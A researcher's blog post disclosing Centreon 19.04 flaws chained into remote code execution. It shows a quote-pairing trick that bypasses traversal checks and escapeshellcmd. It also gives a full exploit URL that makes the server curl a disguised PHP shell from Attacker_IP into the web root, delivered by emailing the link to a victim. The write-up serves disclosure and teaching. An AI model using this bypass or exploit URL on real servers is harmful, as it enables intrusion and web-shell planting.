“As a matter of fact, yeah, they were foolproof. The problem is that you don’t have to protect yourself against fools. You have to protect yourself against people like me.”
― Jeffery Deaver

Undisclosed CVE-2019–19484,CVE-2019–19486,CVE-2019–19487

mucomplex
mucomplex
Jan 11 · 4 min read

Last year on October 2019 after one week Centreon 19.04 (version Oct. 16, 2019) release, I manage to found few vulnerabilities that chained together that that produce remote code execution(RCE). I also explain it in my 0-day class about method and technique how to discover new vulnerabilities.It could be some kind of OSWE preparation before taking real exam.another vulnerabilities will not been disclosed here due to complexity of the technique and need long explanation.On this article I will just point out the mistake that programmer done.

Url Redirect

On line 119(./include/core/login/login.php), parameter “p” is some kind hidden parameter

Let us look the example:

admin login with parameter “p”
result after successfully login to main page,parameter “p” remain on urls.
passing parameter “p” and “p2” by using “&”
parameter “p2” does not appear.
Now we encode our ‘&’ to ‘%26’
as result, we successfully pass the parameter. this information will be used later.

now we look into “configuration/configObject/command/minPlayCommand.php” file. This file has implement many sanitization, but still I manage to bypass those. Security check for the code is implement on (3 Jan,2019)

https://github.com/centreon/centreon/pull/7099

On line 43, We cant use trick to encode our url, it might decode it. Line 47 is replacement of $command value.

line 140 until 143 is Path checking. Line 144 is checking for directory traversal by checking (‘/../’) . Line 147 , escapeshellcmd is implemented.

Conclude that, I need to pass implementation urldecode,str_replace,path checking,directory traversal and escapeshellcmd. This might be scary to look by hacker. but it still possible to bypass it. Remember my article about security bypass?, you still can bypass directory traversal by adding double qoute or single qoute like this (‘ /.’’./ ‘) and (‘ /.””./’) . So we able to bypass hardcoded directory traversal checking.Wait?.. but we need to bypass escapeshellcmd right?

If you read the documentation clearly, “escapeshellcmd escape following character with backslash &#;`|*?~<>^()[]{}$\, \x0A and \xFF.” If we look carefully, and are escaped only if they are not paired. did we pair our ‘ and “ in directory traversal?, if yes , mean we are bypassing escapeshellcmd too!

Now let feed with crafted payload that execute “whoami”. You will see output is “apache”

I’m faking the php shell payload with update.txt , so it not look suspicious as below, this link will be send to victim via email:

http://Targets_IP/centreon/index.php?p=60801%26command_line=$USER1$/.''./.''./.''./.''./.''./.''./bin/curl http://Attacker_IP/update.txt -o /usr/share/centreon/www/update.php%26o=p%26min=1

If success, status will be “OK”

Finally, I successfully upload my payload.

If netcat is installed on target machine

After contact the vendor, this will be fixed on Centreon Web 19.04.5 ,but for centreon 19.04.4 and below are affected. I hope it worth to learn security issue here. thanks.

Thanks to my friend luqman hakim zahari to point out this application and attack vector after he play hackthebox.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade